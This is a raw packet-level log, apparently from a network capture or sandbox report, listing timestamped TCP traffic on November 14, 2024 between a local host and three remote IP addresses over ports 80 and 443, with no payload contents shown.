                                                                                        Nov 14, 2024 08:08:19.587430954 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.587440014 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.587498903 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.587512016 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.587594986 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.587654114 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.587675095 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.587824106 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.587830067 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.587853909 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.587888002 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.592176914 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592202902 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592209101 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592278004 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.592375040 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592452049 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592500925 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.592556953 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592641115 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.592645884 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592653036 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592794895 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.592809916 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592816114 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.592855930 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.593483925 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.642853022 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.704227924 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.704252005 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.704266071 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.704282999 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.704392910 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.704400063 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.704404116 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.704437017 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.704502106 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.704715967 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.704814911 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.704828024 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.704855919 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.709139109 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709158897 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709188938 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709249020 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.709415913 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709430933 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709472895 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.709538937 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709604979 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709645033 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.709662914 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709774971 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709786892 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.709810972 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.709940910 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.710511923 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.710551977 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.821162939 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.821181059 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.821212053 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.821222067 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.821232080 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.821250916 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.821300030 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.821329117 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.821583986 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.821605921 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.821614981 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.821666956 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.825853109 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.825894117 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.825900078 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.825933933 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.825952053 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.825962067 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.825989962 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.826028109 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.826133966 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.826141119 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.826149940 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.826190948 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.826746941 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.826806068 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.826854944 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.826886892 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.826910019 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.826952934 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.826957941 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.826999903 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.827070951 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.877214909 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.938445091 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.938467979 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.938482046 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.938571930 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.938668013 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.938673973 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.938687086 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.938734055 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.938971996 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.939091921 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.939100981 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.939143896 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.942790985 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.942909002 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.942919016 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.942949057 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.942994118 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.943018913 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.943025112 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.943036079 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.943042040 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.943073034 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.943099022 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.943451881 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.944031000 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.944063902 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.944188118 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.944192886 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.944205046 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.944247007 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.944268942 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.944358110 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.944397926 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.057404995 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.057434082 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.057442904 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.057452917 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.057459116 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.057466030 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.057477951 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.057485104 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.057523966 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.057565928 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.060662031 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.060838938 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.060858965 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.060893059 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.060920954 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.060944080 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.060987949 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061019897 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061065912 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.061153889 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061328888 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061364889 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061378002 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.061486959 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061506033 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061539888 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.061661005 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061698914 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061711073 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.061794996 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.061845064 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.101907969 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.102035046 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.102044106 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.102222919 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.172076941 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.172118902 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.172130108 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.172204018 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.172277927 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.172307014 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.172318935 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.172334909 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.172415018 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.172467947 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.172569036 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.172580004 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.172621012 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.176383018 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.176474094 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.176485062 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.176491022 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.176543951 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.176615953 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.176629066 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.176690102 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.176748991 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.176843882 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.176882982 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.176966906 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.176979065 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.177026987 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.180187941 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.180273056 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.180280924 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.180329084 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.180449009 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.180463076 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.180490017 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.217747927 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.217780113 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.217824936 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.217920065 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.217920065 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.218036890 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.261970043 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.793016911 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:20.904618025 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:20.904674053 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:20.904757977 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:20.906173944 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:20.906198025 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:21.526171923 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:21.526629925 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:21.530520916 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:21.530531883 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:21.530910969 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:21.580302954 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:21.594183922 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:21.594208956 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:21.594667912 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.073875904 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.074126959 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.074198008 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:22.075874090 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:22.075896978 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.075911045 CET49705443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:22.075917959 CET44349705188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.376833916 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:22.376868963 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.376929998 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:22.391619921 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:22.391638994 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.248636007 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.248794079 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.251542091 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.251553059 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.251837969 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.253247023 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.295327902 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.854532003 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.854552984 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.854604959 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.854628086 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.854641914 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.854690075 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.867844105 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.867918968 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.867929935 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.867952108 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.867981911 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.868004084 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.973007917 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.973184109 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.973232985 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.973345995 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.973359108 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.973448992 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.973501921 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.973587036 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.973598957 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.973611116 CET49706443192.168.2.5104.102.49.254
                                                                                        Nov 14, 2024 08:08:23.973615885 CET44349706104.102.49.254192.168.2.5
                                                                                        Nov 14, 2024 08:08:24.144107103 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:24.144155979 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:24.144265890 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:24.144640923 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:24.144653082 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:24.766604900 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:24.766719103 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:24.768413067 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:24.768429995 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:24.768738031 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:24.770838022 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:24.770867109 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:24.770917892 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:25.512994051 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:25.513088942 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:25.513279915 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:25.513406038 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:25.513406038 CET49707443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:25.513425112 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:25.513437033 CET44349707188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:25.557048082 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:25.557099104 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:25.557208061 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:25.557533026 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:25.557543993 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.182497978 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.182744026 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.184101105 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.184124947 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.184374094 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.185797930 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.185797930 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.185895920 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.697221041 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.697419882 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.697508097 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.697594881 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.697598934 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.697678089 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.697737932 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.697844982 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.697910070 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.697926044 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.752613068 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.752645969 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.799242973 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.842643976 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.842885971 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.842974901 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.842974901 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.843013048 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.843070030 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.843075991 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.843379974 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.843542099 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.843626976 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.843626976 CET49708443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.843647003 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.843657017 CET44349708188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.866583109 CET49709443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.866631031 CET44349709188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:26.866703033 CET49709443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.867011070 CET49709443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:26.867031097 CET44349709188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:27.485399961 CET44349709188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:27.485558987 CET49709443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:27.487282038 CET49709443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:27.487298012 CET44349709188.114.96.3192.168.2.5
